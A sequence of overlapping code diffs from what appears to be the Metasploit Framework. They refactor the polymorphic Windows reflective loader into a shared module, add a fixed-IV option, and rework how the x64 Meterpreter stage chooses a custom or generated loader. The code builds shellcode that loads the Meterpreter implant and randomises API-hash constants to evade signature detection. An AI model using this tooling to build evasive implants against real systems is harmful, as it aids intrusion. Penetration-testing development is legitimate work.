+    reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "db 0xb8, 0x00, 0x00, 0x00, 0x00", "db 0xb8, #{iv_bytes}")
+
+    vprint_status("Random IV: #{iv}")
+    patches = [
+    { :base => "db 0x81, 0xff,", name: 'KERNEL32.DLL', unicode: true },
+    { :base => "db 0x81, 0xff,", name: 'NTDLL.DLL', unicode: true},
+    { :base => "db 0x3d,", name: 'LoadLibraryA', count: 2},
+    { :base => "db 0x3d,", name: 'GetProcAddress'},
+    { :base => "db 0x3d,", name: 'ZwAllocateVirtualMemory', count: 2},
+    { :base => "db 0x3d,", name: 'ZwProtectVirtualMemory'},
+    { :base => "db 0x3d,", name: 'NtFlushInstructionCache', count: 2},
+    ]
+
+    patches.each { |patch|
+    count = patch.fetch(:count) { 1 }
+    old_hash = _to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: 0)
+    new_hash = _to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: iv)
+    count.times do
+        vprint_status("Applying patch from #{old_hash} to #{new_hash} for #{patch[:name]}")
+        reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "#{patch[:base]} #{old_hash}", "#{patch[:base]} #{new_hash}")
+    end
+    }
+    code = Metasm::Shellcode.assemble(Metasm::X86.new, reflective_loader_asm).encode_string
+    hash = Rex::Text.md5_raw(code).unpack("H*").first
+    vprint_status("Reflective Loader GraphML fingerprint: #{hash}")
+    code
+  end
+end

--- a/lib/msf/core/payload/windows/reflective_loader.rb
+++ b/lib/msf/core/payload/windows/reflective_loader.rb
@@ -1,53 +1,21 @@
 module Msf::Payload::Windows::ReflectiveLoader
+  include Msf::Payload::Windows::ReflectiveLoaderCommon
+
+  # Assemble the polymorphic x86 reflective loader shellcode with a fresh
+  # ROR13 IV. See {ReflectiveLoaderCommon#build_reflective_loader} for the
+  # patching pipeline.
+  #
+  # @param opts [Hash]
+  # @option opts [Integer] :iv 32-bit seed for ROR13 hashing (random when omitted)
+  # @return [String] assembled and patched x86 reflective loader shellcode
+  # @raise [ReflectiveLoaderCommon::Error] if an expected opcode pattern is missing from the shuffled assembly
   def reflective_loader(opts = {})
-    iv = opts.fetch(:iv) { rand(0x100000000) } & 0xFFFFFFFF
-    reflective_loader_asm = Rex::Payloads::Shuffle.from_graphml_file(
-    File.join(Msf::Config.install_root, 'data', 'shellcode', 'reflective_loader.x86.graphml'),
-    arch: ARCH_X86,
-    name: 'reflective_loader'
-    )
-    
-    _patch_bytes = lambda { |asm, oldbytes, newbytes|
-    unless asm.include?(oldbytes)
-        raise "Failed to patch, opcode: #{oldbytes} not found."
-    end
-    asm.sub!(oldbytes, newbytes)
-    }
-
-    _to_hashbytes = lambda { |name, nullbyte: false, unicode: false, iv: 0|
-        name = name.unpack('C*').pack('v*') if unicode
-        fun_hash = Rex::Text.ror13_hash(name + (nullbyte ? "\x00" : ""), iv: iv) & 0xFFFFFFFF
-        [fun_hash].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
-    }
-
-    # Patching IV
-    iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ')
-    reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}")
-    reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "db 0xb8, 0x00, 0x00, 0x00, 0x00", "db 0xb8, #{iv_bytes}")
-
-    vprint_status("Random IV: #{iv}")
-    patches = [
-    { :base => "db 0x81, 0xff,", name: 'KERNEL32.DLL', unicode: true },
-    { :base => "db 0x81, 0xff,", name: 'NTDLL.DLL', unicode: true},
-    { :base => "db 0x3d,", name: 'LoadLibraryA', count: 2},
-    { :base => "db 0x3d,", name: 'GetProcAddress'},
-    { :base => "db 0x3d,", name: 'ZwAllocateVirtualMemory', count: 2},
-    { :base => "db 0x3d,", name: 'ZwProtectVirtualMemory'},
-    { :base => "db 0x3d,", name: 'NtFlushInstructionCache', count: 2},
-    ]
-
-    patches.each { |patch|
-    count = patch.fetch(:count) { 1 }
-    old_hash = _to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: 0)
-    new_hash = _to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: iv)
-    count.times do
-        vprint_status("Applying patch from #{old_hash} to #{new_hash} for #{patch[:name]}")
-        reflective_loader_asm = _patch_bytes.call(reflective_loader_asm, "#{patch[:base]} #{old_hash}", "#{patch[:base]} #{new_hash}")
-    end
-    }
-    code = Metasm::Shellcode.assemble(Metasm::X86.new, reflective_loader_asm).encode_string
-    hash = Rex::Text.md5_raw(code).unpack("H*").first
-    vprint_status("Reflective Loader GraphML fingerprint: #{hash}")
-    code
+    build_reflective_loader(opts, {
+      graphml_path:      File.join(Msf::Config.install_root, 'data', 'shellcode', 'reflective_loader.x86.graphml'),
+      arch:              ARCH_X86,
+      metasm_arch:       Metasm::X86,
+      iv_patch_prefixes: ['db 0xbf,', 'db 0xb8,'],
+      dll_hash_base:     'db 0x81, 0xff,'
+    })
   end
 end

--- a/lib/msf/core/payload/windows/reflective_loader_common.rb
+++ b/lib/msf/core/payload/windows/reflective_loader_common.rb
@@ -1,0 +1,89 @@
+# -*- coding: binary -*-
+
+###
+#
+# Shared assembly / patching logic for the polymorphic reflective loader.
+# Both the ARCH_X86 and ARCH_X64 loader modules include this module and
+# call {#build_reflective_loader} with arch-specific data (GraphML path,
+# opcode prefixes, Metasm arch).
+#
+###
+module Msf::Payload::Windows::ReflectiveLoaderCommon
+
+  # Raised by {#build_reflective_loader} when a required opcode pattern is
+  # missing from the shuffled reflective-loader assembly (the ROR13 IV mov,
+  # a DLL name-hash compare, or a function name-hash compare). Almost always
+  # indicates a malformed or out-of-date GraphML template.
+  class Error < RuntimeError; end
+
+  # Build the reflective loader shellcode: shuffle the GraphML template,
+  # patch the freshly generated ROR13 IV into the two `mov reg, IV`
+  # instructions, patch every pre-computed DLL / function name hash to
+  # match the new IV, then assemble via Metasm.
+  #
+  # @param opts [Hash]
+  # @option opts [Integer] :iv 32-bit seed for ROR13 hashing (random when omitted)
+  # @param arch_config [Hash] arch-specific data supplied by the includer
+  # @option arch_config [String] :graphml_path absolute path to the GraphML file
+  # @option arch_config [Symbol] :arch ARCH_X86 or ARCH_X64
+  # @option arch_config [Class]  :metasm_arch Metasm::X86 or Metasm::X64
+  # @option arch_config [Array<String>] :iv_patch_prefixes opcode prefixes of the two `mov reg, IV` instructions that receive the IV
+  # @option arch_config [String] :dll_hash_base opcode prefix of the `cmp reg, hash` instruction that matches DLL name hashes
+  # @return [String] assembled and patched reflective loader shellcode
+  # @raise [Error] if an expected opcode pattern is missing from the shuffled assembly
+  def build_reflective_loader(opts, arch_config)
+    iv = opts.fetch(:iv) { rand(0x100000000) } & 0xFFFFFFFF
+
+    asm = Rex::Payloads::Shuffle.from_graphml_file(
+      arch_config[:graphml_path],
+      arch: arch_config[:arch],
+      name: 'reflective_loader'
+    )
+
+    patch_bytes = lambda { |code, oldbytes, newbytes|
+      raise Error, "Failed to patch, opcode: #{oldbytes} not found." unless code.include?(oldbytes)
+      code.sub(oldbytes, newbytes)
+    }
+
+    to_hashbytes = lambda { |name, nullbyte: false, unicode: false, iv: 0|
+      name = name.unpack('C*').pack('v*') if unicode
+      fun_hash = Rex::Text.ror13_hash(name + (nullbyte ? "\x00" : ''), iv: iv) & 0xFFFFFFFF
+      [fun_hash].pack('V').bytes.map { |b| '0x%02x' % b }.join(', ')
+    }
+
+    iv_bytes = [iv].pack('V').bytes.map { |b| '0x%02x' % b }.join(', ')
+    arch_config[:iv_patch_prefixes].each do |prefix|
+      asm = patch_bytes.call(asm, "#{prefix} 0x00, 0x00, 0x00, 0x00", "#{prefix} #{iv_bytes}")
+    end
+
+    vprint_status("Random IV: #{iv}")
+
+    dll_hash_base = arch_config[:dll_hash_base]
+    # The static graphml data uses hashes calculated with an IV of 0, so we patch them here using
+    # the runtime's random value.
+    patches = [
+      { base: dll_hash_base, name: 'KERNEL32.DLL',            unicode: true },
+      { base: dll_hash_base, name: 'NTDLL.DLL',               unicode: true },
+      { base: 'db 0x3d,',    name: 'LoadLibraryA',            count: 2 },
+      { base: 'db 0x3d,',    name: 'GetProcAddress' },
+      { base: 'db 0x3d,',    name: 'ZwAllocateVirtualMemory', count: 2 },
+      { base: 'db 0x3d,',    name: 'ZwProtectVirtualMemory' },
+      { base: 'db 0x3d,',    name: 'NtFlushInstructionCache', count: 2 }
+    ]
+
+    patches.each do |patch|
+      count = patch.fetch(:count) { 1 }
+      old_hash = to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: 0)
+      new_hash = to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: iv)
+      count.times do
+        vprint_status("Applying patch from #{old_hash} to #{new_hash} for #{patch[:name]}")
+        asm = patch_bytes.call(asm, "#{patch[:base]} #{old_hash}", "#{patch[:base]} #{new_hash}")
+      end
+    end
+
+    code = Metasm::Shellcode.assemble(arch_config[:metasm_arch].new, asm).encode_string
+    hash = Rex::Text.md5_raw(code).unpack('H*').first
+    vprint_status("Reflective Loader GraphML fingerprint: #{hash}")
+    code
+  end
+end

--- a/lib/msf/core/payload/windows/reflective_loader_common.rb
+++ b/lib/msf/core/payload/windows/reflective_loader_common.rb
@@ -9,7 +9,6 @@
 #
 ###
 module Msf::Payload::Windows::ReflectiveLoaderCommon
-
   # Raised by {#build_reflective_loader} when a required opcode pattern is
   # missing from the shuffled reflective-loader assembly (the ROR13 IV mov,
   # a DLL name-hash compare, or a function name-hash compare). Almost always
@@ -42,6 +41,7 @@ module Msf::Payload::Windows::ReflectiveLoaderCommon
 
     patch_bytes = lambda { |code, oldbytes, newbytes|
       raise Error, "Failed to patch, opcode: #{oldbytes} not found." unless code.include?(oldbytes)
+
       code.sub(oldbytes, newbytes)
     }
 
@@ -56,19 +56,19 @@ module Msf::Payload::Windows::ReflectiveLoaderCommon
       asm = patch_bytes.call(asm, "#{prefix} 0x00, 0x00, 0x00, 0x00", "#{prefix} #{iv_bytes}")
     end
 
-    vprint_status("Random IV: #{iv}")
+    dlog("Random IV: #{iv}")
 
     dll_hash_base = arch_config[:dll_hash_base]
     # The static graphml data uses hashes calculated with an IV of 0, so we patch them here using
     # the runtime's random value.
     patches = [
-      { base: dll_hash_base, name: 'KERNEL32.DLL',            unicode: true },
-      { base: dll_hash_base, name: 'NTDLL.DLL',               unicode: true },
-      { base: 'db 0x3d,',    name: 'LoadLibraryA',            count: 2 },
-      { base: 'db 0x3d,',    name: 'GetProcAddress' },
-      { base: 'db 0x3d,',    name: 'ZwAllocateVirtualMemory', count: 2 },
-      { base: 'db 0x3d,',    name: 'ZwProtectVirtualMemory' },
-      { base: 'db 0x3d,',    name: 'NtFlushInstructionCache', count: 2 }
+      { base: dll_hash_base, name: 'KERNEL32.DLL', unicode: true },
+      { base: dll_hash_base, name: 'NTDLL.DLL', unicode: true },
+      { base: 'db 0x3d,', name: 'LoadLibraryA', count: 2 },
+      { base: 'db 0x3d,', name: 'GetProcAddress' },
+      { base: 'db 0x3d,', name: 'ZwAllocateVirtualMemory', count: 2 },
+      { base: 'db 0x3d,', name: 'ZwProtectVirtualMemory' },
+      { base: 'db 0x3d,', name: 'NtFlushInstructionCache', count: 2 }
     ]
 
     patches.each do |patch|
@@ -76,14 +76,14 @@ module Msf::Payload::Windows::ReflectiveLoaderCommon
       old_hash = to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: 0)
       new_hash = to_hashbytes.call(patch[:name], unicode: patch[:unicode], iv: iv)
       count.times do
-        vprint_status("Applying patch from #{old_hash} to #{new_hash} for #{patch[:name]}")
+        dlog("Applying patch from #{old_hash} to #{new_hash} for #{patch[:name]}")
         asm = patch_bytes.call(asm, "#{patch[:base]} #{old_hash}", "#{patch[:base]} #{new_hash}")
       end
     end
 
     code = Metasm::Shellcode.assemble(arch_config[:metasm_arch].new, asm).encode_string
     hash = Rex::Text.md5_raw(code).unpack('H*').first
-    vprint_status("Reflective Loader GraphML fingerprint: #{hash}")
+    dlog("Reflective Loader GraphML fingerprint: #{hash}")
     code
   end
 end

--- a/lib/msf/core/payload/windows/reflective_loader_common.rb
+++ b/lib/msf/core/payload/windows/reflective_loader_common.rb
@@ -15,6 +15,33 @@ module Msf::Payload::Windows::ReflectiveLoaderCommon
   # indicates a malformed or out-of-date GraphML template.
   class Error < RuntimeError; end
 
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        Msf::OptString.new(
+          'MeterpreterLoader::ReflectiveLoaderIV',
+          [false, 'Fixed 32-bit ROR13 IV for the polymorphic reflective loader (decimal or 0x-hex). ' \
+                  'Also seeds the GraphML shuffle, so a fixed IV yields a deterministic loader. Random when empty.']
+        )
+      ],
+      Msf::Payload::Windows::ReflectiveLoaderCommon
+    )
+  end
+
+  # Parse the datastore-supplied fixed IV, if any. Accepts decimal or 0x-prefixed hex.
+  # Returns nil when the option is unset or blank so the caller falls back to a random IV.
+  #
+  # @param ds [Msf::DataStore, Hash] the payload datastore
+  # @return [Integer, nil] parsed 32-bit IV or nil
+  # @raise [ArgumentError] if the option is set but not a valid integer literal
+  def datastore_reflective_loader_iv(ds)
+    raw = ds['MeterpreterLoader::ReflectiveLoaderIV']
+    return nil if raw.nil? || raw.to_s.strip.empty?
+
+    Integer(raw.to_s.strip, 0) & 0xFFFFFFFF
+  end
+
   # Build the reflective loader shellcode: shuffle the GraphML template,
   # patch the freshly generated ROR13 IV into the two `mov reg, IV`
   # instructions, patch every pre-computed DLL / function name hash to
@@ -31,12 +58,13 @@ module Msf::Payload::Windows::ReflectiveLoaderCommon
   # @return [String] assembled and patched reflective loader shellcode
   # @raise [Error] if an expected opcode pattern is missing from the shuffled assembly
   def build_reflective_loader(opts, arch_config)
-    iv = opts.fetch(:iv) { rand(0x100000000) } & 0xFFFFFFFF
+    iv = (opts[:iv] || rand(0x100000000)) & 0xFFFFFFFF
 
     asm = Rex::Payloads::Shuffle.from_graphml_file(
       arch_config[:graphml_path],
       arch: arch_config[:arch],
-      name: 'reflective_loader'
+      name: 'reflective_loader',
+      random: Random.new(iv)
     )
 
     patch_bytes = lambda { |code, oldbytes, newbytes|
@@ -56,7 +84,7 @@ module Msf::Payload::Windows::ReflectiveLoaderCommon
       asm = patch_bytes.call(asm, "#{prefix} 0x00, 0x00, 0x00, 0x00", "#{prefix} #{iv_bytes}")
     end
 
-    dlog("Random IV: #{iv}")
+    dlog("ReflectiveLoader IV: #{iv}")
 
     dll_hash_base = arch_config[:dll_hash_base]
     # The static graphml data uses hashes calculated with an IV of 0, so we patch them here using

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -134,7 +134,7 @@ module Payload::Windows::MeterpreterLoader_x64
     end
 
     if rdi_offset.nil? && !use_loader
-      loader = reflective_loader
+      loader = reflective_loader(iv: datastore_reflective_loader_iv(ds))
       use_loader = true
     end
 

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -139,7 +139,10 @@ module Payload::Windows::MeterpreterLoader_x64
     end
 
     asm_opts = {
-      rdi_offset: rdi_offset || dll.length, # the reflective loader is appended to the end of the DLL, so its offset within the payload equals the DLL length
+      # when a custom/polymorphic loader is appended, it must take priority over any
+      # ReflectiveLoader already embedded in the DLL, since that's the loader whose bytes
+      # actually follow the DLL in the payload
+      rdi_offset: use_loader ? dll.length : rdi_offset,
       length:     dll.length + (loader ? loader.length : 0), # total payload length = DLL + reflective loader
       stageless:  opts[:stageless] == true
     }

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -29,7 +29,7 @@ module Payload::Windows::MeterpreterLoader_x64
       'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi -https' },
       'Stage'         => { 'Payload'   => "" }
       ))
-      register_options([
+      register_advanced_options([
         OptBool.new('MeterpreterLoader::CustomLoader', [ false, 'Use a custom loader', false ]),
       ], self.class)
   end
@@ -73,31 +73,6 @@ module Payload::Windows::MeterpreterLoader_x64
   def stage_payload(opts={})
     stage_meterpreter(opts) + generate_config(opts)
   end
-
-  def stage_with_custom_loader(opts={})
-    ds = opts[:datastore] || datastore
-    debug_build = ds['MeterpreterDebugBuild']
-    metsrv_path = MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build)
-    meterpreter_data_dir = File.join(Msf::Config.data_directory, 'meterpreter')
-    custom_loader_path = File.join(meterpreter_data_dir, 'custom_loader_x64.bin')
-    print_status("Generating custom loader for Meterpreter stage...")
-    unless File.exist?(custom_loader_path)
-      print_status("Custom loader not found at #{custom_loader_path}, drop your loader there and try again.")
-      raise RuntimeError, "Custom loader not found at #{custom_loader_path}"
-    end
-    
-    custom_loader = File.binread(custom_loader_path)
-    encrypted_dll = ::File.binread(dll_path)
-    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: encrypted_dll)
-
-    asm_opts = {
-      rdi_offset: dll.length, # we will append the dll to the end of the custom loader, so the offset to it is just the length of the custom loader
-      length:     dll.length + custom_loader.length, # the total length of the payload is the length of the custom loader + the dll
-      stageless:  opts[:stageless] == true
-    }
-
-  end
-
 
   def generate_config(opts={})
     ds = opts[:datastore] || datastore
@@ -157,7 +132,7 @@ module Payload::Windows::MeterpreterLoader_x64
         length:     dll.length + custom_loader.length, # the total length of the payload is the length of the custom loader + the dll
         stageless:  opts[:stageless] == true
       }
-      vprint_status("Using custom loader at #{custom_loader_path}")
+      puts("WARNING: Local file #{custom_loader_path} is being used")
       vprint_status("Custom loader length: #{custom_loader.length} bytes")
       vprint_status("DLL length: #{dll.length} bytes")
       vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -29,6 +29,9 @@ module Payload::Windows::MeterpreterLoader_x64
       'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi -https' },
       'Stage'         => { 'Payload'   => "" }
       ))
+      register_options([
+        OptBool.new('MeterpreterLoader::CustomLoader', [ false, 'Use a custom loader', false ]),
+      ], self.class)
   end
 
   def asm_invoke_metsrv(opts={})
@@ -71,6 +74,31 @@ module Payload::Windows::MeterpreterLoader_x64
     stage_meterpreter(opts) + generate_config(opts)
   end
 
+  def stage_with_custom_loader(opts={})
+    ds = opts[:datastore] || datastore
+    debug_build = ds['MeterpreterDebugBuild']
+    metsrv_path = MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build)
+    meterpreter_data_dir = File.join(Msf::Config.data_directory, 'meterpreter')
+    custom_loader_path = File.join(meterpreter_data_dir, 'custom_loader_x64.bin')
+    print_status("Generating custom loader for Meterpreter stage...")
+    unless File.exist?(custom_loader_path)
+      print_status("Custom loader not found at #{custom_loader_path}, drop your loader there and try again.")
+      raise RuntimeError, "Custom loader not found at #{custom_loader_path}"
+    end
+    
+    custom_loader = File.binread(custom_loader_path)
+    encrypted_dll = ::File.binread(dll_path)
+    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: encrypted_dll)
+
+    asm_opts = {
+      rdi_offset: dll.length, # we will append the dll to the end of the custom loader, so the offset to it is just the length of the custom loader
+      length:     dll.length + custom_loader.length, # the total length of the payload is the length of the custom loader + the dll
+      stageless:  opts[:stageless] == true
+    }
+
+  end
+
+
   def generate_config(opts={})
     ds = opts[:datastore] || datastore
     opts[:uuid] ||= generate_payload_uuid
@@ -106,14 +134,35 @@ module Payload::Windows::MeterpreterLoader_x64
   def stage_meterpreter(opts={})
     ds = opts[:datastore] || datastore
     debug_build = ds['MeterpreterDebugBuild']
+    custom_loader = ds['MeterpreterLoader::CustomLoader'] == true
     # Exceptions will be thrown by the mixin if there are issues.
-    dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build))
 
-    asm_opts = {
-      rdi_offset: offset,
-      length:     dll.length,
-      stageless:  opts[:stageless] == true
-    }
+    unless custom_loader
+      dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build))
+      asm_opts = {
+        rdi_offset: offset,
+        length:     dll.length,
+        stageless:  opts[:stageless] == true
+      }
+    else
+      dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build)))
+      custom_loader_path = ::File.join(Msf::Config.data_directory, 'meterpreter', 'custom_loader.x64.bin')
+      unless ::File.exist?(custom_loader_path)
+        print_status("Custom loader not found at #{custom_loader_path}, drop your loader there and try again.")
+        raise RuntimeError, "Custom loader not found at #{custom_loader_path}"
+      end
+      custom_loader = ::File.binread(custom_loader_path)
+      asm_opts = {
+        rdi_offset: dll.length, # we will append the dll to the end of the custom loader, so the offset to it is just the length of the custom loader
+        length:     dll.length + custom_loader.length, # the total length of the payload is the length of the custom loader + the dll
+        stageless:  opts[:stageless] == true
+      }
+      vprint_status("Using custom loader at #{custom_loader_path}")
+      vprint_status("Custom loader length: #{custom_loader.length} bytes")
+      vprint_status("DLL length: #{dll.length} bytes")
+      vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
+      vprint_status("Configuration offset: #{asm_opts[:length]} bytes")
+    end
 
     asm = asm_invoke_metsrv(asm_opts)
 
@@ -127,7 +176,7 @@ module Payload::Windows::MeterpreterLoader_x64
 
     # patch the bootstrap code into the dll's DOS header...
     dll[ 0, bootstrap.length ] = bootstrap
-
+    dll = dll + custom_loader if custom_loader
     dll
   end
 

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -14,6 +14,7 @@ module Payload::Windows::MeterpreterLoader_x64
 
   include Msf::ReflectiveDLLLoader
   include Msf::Payload::Windows
+  include Msf::Payload::Windows::ReflectiveLoaderX64
 
   def initialize(info = {})
     super(update_info(info,
@@ -110,35 +111,27 @@ module Payload::Windows::MeterpreterLoader_x64
     ds = opts[:datastore] || datastore
     debug_build = ds['MeterpreterDebugBuild']
     custom_loader = ds['MeterpreterLoader::CustomLoader'] == true
-    # Exceptions will be thrown by the mixin if there are issues.
 
-    unless custom_loader
-      dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build))
-      asm_opts = {
-        rdi_offset: offset,
-        length:     dll.length,
-        stageless:  opts[:stageless] == true
-      }
-    else
-      dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build)))
+    loader = reflective_loader()
+    if custom_loader
       custom_loader_path = ::File.join(Msf::Config.data_directory, 'meterpreter', 'custom_loader.x64.bin')
       unless ::File.exist?(custom_loader_path)
         print_status("Custom loader not found at #{custom_loader_path}, drop your loader there and try again.")
         raise RuntimeError, "Custom loader not found at #{custom_loader_path}"
       end
-      custom_loader = ::File.binread(custom_loader_path)
-      asm_opts = {
+      loader = ::File.binread(custom_loader_path)
+    end
+    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build)))
+    asm_opts = {
         rdi_offset: dll.length, # we will append the dll to the end of the custom loader, so the offset to it is just the length of the custom loader
-        length:     dll.length + custom_loader.length, # the total length of the payload is the length of the custom loader + the dll
+        length:     dll.length + loader.length, # the total length of the payload is the length of the custom loader + the dll
         stageless:  opts[:stageless] == true
       }
-      puts("WARNING: Local file #{custom_loader_path} is being used")
-      vprint_status("Custom loader length: #{custom_loader.length} bytes")
-      vprint_status("DLL length: #{dll.length} bytes")
-      vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
-      vprint_status("Configuration offset: #{asm_opts[:length]} bytes")
-    end
-
+    puts("WARNING: Local file #{custom_loader_path} is being used") if custom_loader
+    vprint_status("Loader length: #{loader.length} bytes")
+    vprint_status("DLL length: #{dll.length} bytes")
+    vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
+    vprint_status("Configuration offset: #{asm_opts[:length]} bytes")
     asm = asm_invoke_metsrv(asm_opts)
 
     # generate the bootstrap asm
@@ -151,12 +144,8 @@ module Payload::Windows::MeterpreterLoader_x64
 
     # patch the bootstrap code into the dll's DOS header...
     dll[ 0, bootstrap.length ] = bootstrap
-    dll = dll + custom_loader if custom_loader
-    dll
+    dll + loader
   end
-
 end
 
 end
-
-

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -30,9 +30,6 @@ module Payload::Windows::MeterpreterLoader_x64
       'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi -https' },
       'Stage'         => { 'Payload'   => "" }
       ))
-      register_advanced_options([
-        OptBool.new('MeterpreterLoader::CustomLoader', [ false, 'Use a custom loader', false ]),
-      ], self.class)
   end
 
   def asm_invoke_metsrv(opts={})
@@ -110,28 +107,37 @@ module Payload::Windows::MeterpreterLoader_x64
   def stage_meterpreter(opts={})
     ds = opts[:datastore] || datastore
     debug_build = ds['MeterpreterDebugBuild']
-    custom_loader = ds['MeterpreterLoader::CustomLoader'] == true
 
-    loader = reflective_loader()
-    if custom_loader
-      custom_loader_path = ::File.join(Msf::Config.data_directory, 'meterpreter', 'custom_loader.x64.bin')
-      unless ::File.exist?(custom_loader_path)
-        print_status("Custom loader not found at #{custom_loader_path}, drop your loader there and try again.")
-        raise RuntimeError, "Custom loader not found at #{custom_loader_path}"
-      end
+    # Prefer a site-local custom loader binary if the user has dropped one into
+    # the meterpreter search paths (~/.msf4/user_data/meterpreter/ or
+    # <msf>/data/meterpreter/); otherwise assemble the polymorphic reflective
+    # loader on the fly.
+    custom_loader_path = [
+      ::MetasploitPayloads.user_meterpreter_dir,
+      ::MetasploitPayloads.msf_meterpreter_dir
+    ].map { |dir| ::File.join(dir, 'custom_loader.x64.bin') }.find { |p| ::File.readable?(p) }
+
+    if custom_loader_path
+      ::MetasploitPayloads.warn_local_path(custom_loader_path)
       loader = ::File.binread(custom_loader_path)
+    else
+      begin
+        loader = reflective_loader
+      rescue Msf::Payload::Windows::ReflectiveLoaderCommon::Error => e
+        elog('Reflective loader generation failed', error: e)
+        raise
+      end
     end
     dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build)))
     asm_opts = {
-        rdi_offset: dll.length, # we will append the dll to the end of the custom loader, so the offset to it is just the length of the custom loader
-        length:     dll.length + loader.length, # the total length of the payload is the length of the custom loader + the dll
+        rdi_offset: dll.length, # the reflective loader is appended to the end of the DLL, so its offset within the payload equals the DLL length
+        length:     dll.length + loader.length, # total payload length = DLL + reflective loader
         stageless:  opts[:stageless] == true
       }
-    puts("WARNING: Local file #{custom_loader_path} is being used") if custom_loader
-    vprint_status("Loader length: #{loader.length} bytes")
-    vprint_status("DLL length: #{dll.length} bytes")
-    vprint_status("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
-    vprint_status("Configuration offset: #{asm_opts[:length]} bytes")
+    dlog("Loader length: #{loader.length} bytes")
+    dlog("DLL length: #{dll.length} bytes")
+    dlog("ReflectiveLoader offset: #{asm_opts[:rdi_offset]} bytes")
+    dlog("Configuration offset: #{asm_opts[:length]} bytes")
     asm = asm_invoke_metsrv(asm_opts)
 
     # generate the bootstrap asm

--- a/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
+++ b/lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb
@@ -107,6 +107,14 @@ module Payload::Windows::MeterpreterLoader_x64
   def stage_meterpreter(opts={})
     ds = opts[:datastore] || datastore
     debug_build = ds['MeterpreterDebugBuild']
+    loader = nil
+    dll_path = MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build)
+    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(dll_path))
+    begin
+      rdi_offset = parse_pe(dll)
+    rescue
+      rdi_offset = nil
+    end
 
     # Prefer a site-local custom loader binary if the user has dropped one into
     # the meterpreter search paths (~/.msf4/user_data/meterpreter/ or
@@ -117,24 +125,28 @@ module Payload::Windows::MeterpreterLoader_x64
       ::MetasploitPayloads.msf_meterpreter_dir
     ].map { |dir| ::File.join(dir, 'custom_loader.x64.bin') }.find { |p| ::File.readable?(p) }
 
+    use_loader = false
     if custom_loader_path
+      dlog("Using custom loader from #{custom_loader_path}")
       ::MetasploitPayloads.warn_local_path(custom_loader_path)
       loader = ::File.binread(custom_loader_path)
-    else
-      begin
-        loader = reflective_loader
-      rescue Msf::Payload::Windows::ReflectiveLoaderCommon::Error => e
-        elog('Reflective loader generation failed', error: e)
-        raise
-      end
+      use_loader = true
     end
-    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: ::File.binread(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build)))
+
+    if rdi_offset.nil? && !use_loader
+      loader = reflective_loader
+      use_loader = true
+    end
+
     asm_opts = {
-        rdi_offset: dll.length, # the reflective loader is appended to the end of the DLL, so its offset within the payload equals the DLL length
-        length:     dll.length + loader.length, # total payload length = DLL + reflective loader
-        stageless:  opts[:stageless] == true
-      }
-    dlog("Loader length: #{loader.length} bytes")
